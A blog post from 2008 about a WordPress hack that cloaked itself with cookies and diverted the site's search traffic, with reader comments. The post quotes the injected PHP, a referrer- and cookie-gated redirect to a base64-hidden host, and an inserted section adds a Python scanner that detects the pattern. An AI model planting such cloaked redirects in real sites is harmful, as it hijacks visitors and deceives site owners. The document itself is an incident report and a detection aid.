Something scary happened today over at FiveCentNickel. Around 3:30 EDT today I noticed that traffic to the site was lagging way behind normal. Upon further investigation, I realized that my search traffic had all but dried up. Thinking I had been banned by Google, I dug deeper.
Oddly enough, I still ranked well for all of the terms that had brought me traffic in the past. So what was happening? If I was still ranking well in the SERPs, why weren’t people clicking through?
Unsure of what else to do, I enlisted the help of Jim, Flexo, and Clever Dude and sent a shout out to all who are following me on Twitter. Among other things, I asked these guys to search for a few keywords to see if my rankings were holding up.
My search results were just fine, ruling out the possibility that Google had rolled out new search data that excluded little old me, and it just hadn’t filtered down to our neck of the woods.
And then it happened…
Clever Dude clicked on a Google search result and was redirected elsewhere. But when he clicked it again, all was well. When I reported this via IM to Jim, he checked it out and saw something similar.
As it turns out, I was the victim of a WordPress hack that stole pretty much all of my search traffic, but somehow hid itself using cookies. Upon further inspection, I discovered the following bit of code at the top of index.php:
<?php // $seref (the search-engine referrer strings to match, e.g. "google") is set earlier in the injected block and was not reproduced in the post
$ser=0;
foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
// Redirect only cookie-less visitors arriving from a search engine; the target host is hidden in base64 (decodes to "anyresults.net")
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }
?>
If you hit Google without the cookie and tried to click through to my site, you were directed elsewhere. But once it had happened to you, it couldn’t be repeated until you cleared your cookies. Very sneaky.
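A way to check a WordPress install for this pattern, as an added example that is not from the post: the Python script below walks a directory, flags PHP files that combine the referrer test, the "no cookies yet" gate and a base64-hidden redirect, and decodes the hidden hostname. The SAMPLE string is the snippet quoted above; the file-walking and the regex signatures are my own assumptions about how to spot it.

```python
import base64
import os
import re

# Signatures taken from the injected snippet in the post: a referrer test, a
# "visitor has no cookies yet" gate, and a redirect whose host is hidden in base64.
REFERER_CHECK = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_REFERER['\"]\s*\]")
COOKIE_GATE = re.compile(r"(?:sizeof|count)\s*\(\s*\$_COOKIE\s*\)\s*==\s*0")
HIDDEN_REDIRECT = re.compile(
    r"header\s*\(\s*['\"]Location:[^;]*?base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)"
)

def decode_hidden_host(literal):
    """Decode the base64 literal so the redirect target is readable in a report."""
    try:
        return base64.b64decode(literal, validate=True).decode("ascii", "replace")
    except ValueError:
        return None

def scan_source(php_source):
    """Return the indicators found in one PHP file's text (empty dict if clean)."""
    findings = {}
    if REFERER_CHECK.search(php_source):
        findings["referer_check"] = True
    if COOKIE_GATE.search(php_source):
        findings["cookie_gate"] = True
    match = HIDDEN_REDIRECT.search(php_source)
    if match:
        findings["redirect_host"] = decode_hidden_host(match.group(1))
    return findings

def is_cloaked_redirect(findings):
    """All three indicators together are the cookie-cloaked hijack described in the post."""
    return {"referer_check", "cookie_gate", "redirect_host"}.issubset(findings)

def scan_tree(root):
    """Walk a WordPress install and report every PHP file carrying the full pattern."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_source(fh.read())
                if is_cloaked_redirect(findings):
                    hits[path] = findings["redirect_host"]
    return hits

# Constructed test input: the two lines quoted in the post, verbatim.
SAMPLE = """$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>"""
```

Run scan_tree("/path/to/wordpress") against the web root; every hit names the file to clean and the host the traffic was being sent to.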
So where was all of my traffic going?
It was being shunted through www.anyresult.net (no link for you!) and then winding up at a spammy, ad-filled landing page on www.dealtime.com (again, no link for you — I’ve helped enough today). I suspect that dealtime.com had likewise been compromised, though I can’t say for sure.
I’m still not sure how they got in, but I’ve reported it to my host, cleaned everything up, and changed all of my passwords. For reference, I was running WordPress 2.3.3, though I have since upgraded to WordPress 2.5.1.
Before you ask, yes, I’m aware that I was taking a slight risk by running a slightly older version of WordPress. In my defense, however, early releases of major WordPress updates often have numerous bugs of their own. As such, I typically wait until at least X.X.2 before upgrading unless a serious hole is discovered in the version that I’m currently using.
Update: All WordPress versions appear to be vulnerable.
Guess what? I just found one.
June 5th, 2008 at 5:20 pm
That’s a drag. Thanks for sharing the details though. Certainly that would be difficult to diagnose, but having the string of code you posted to reference will make it easy to find for anyone else who has been hacked.
June 6th, 2008 at 9:01 am
I am sorry to hear about the incident. I am glad to see you recovered quickly.
June 7th, 2008 at 12:15 pm
Hello,
My blogs are suffering from the same hack.
How exactly did you clean it up?
Just remove the code from index.php?
June 8th, 2008 at 7:49 am
For what it’s worth, I was running 2.5.1 and also got hacked.
The only difference seems to be the code going to wp-blog-header.php instead of index.php